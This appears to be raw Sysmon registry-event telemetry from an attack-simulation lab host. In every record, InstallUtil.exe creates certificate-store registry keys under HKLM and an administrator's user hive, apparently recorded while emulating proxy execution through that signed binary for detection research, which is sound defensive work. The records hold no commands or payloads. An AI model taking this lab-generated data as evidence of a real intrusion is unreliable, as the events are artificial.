16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057557718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057557717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057557714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057557713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057557712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057557710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057557709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057557708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057557705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057557704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057557703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057557702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057557701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057557700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057557699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057557698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x800000000000000057557697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x800000000000000057557696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 12241200x800000000000000057557695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057557694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057557693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057557692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057557691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057557690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x800000000000000057557689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x800000000000000057557688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 12241200x800000000000000057557687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x800000000000000057557686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x800000000000000057557685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x800000000000000057557684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 12241200x800000000000000057557683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 12241200x800000000000000057557682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057557681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057557680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057557679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057557678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057557677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057557676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057557675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057557674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057557673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057557672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057557671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057557670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057557669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057557668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057557667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057557665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057557664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057557663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057557660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057557659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057557658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057557656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057557655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057557654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057557652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x800000000000000057557651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x800000000000000057557650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x800000000000000057557649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057557648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057557647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057557646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057557645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057557644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057557643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057557642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057557641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057557640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057557639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057557638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057557637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057557636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057557635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 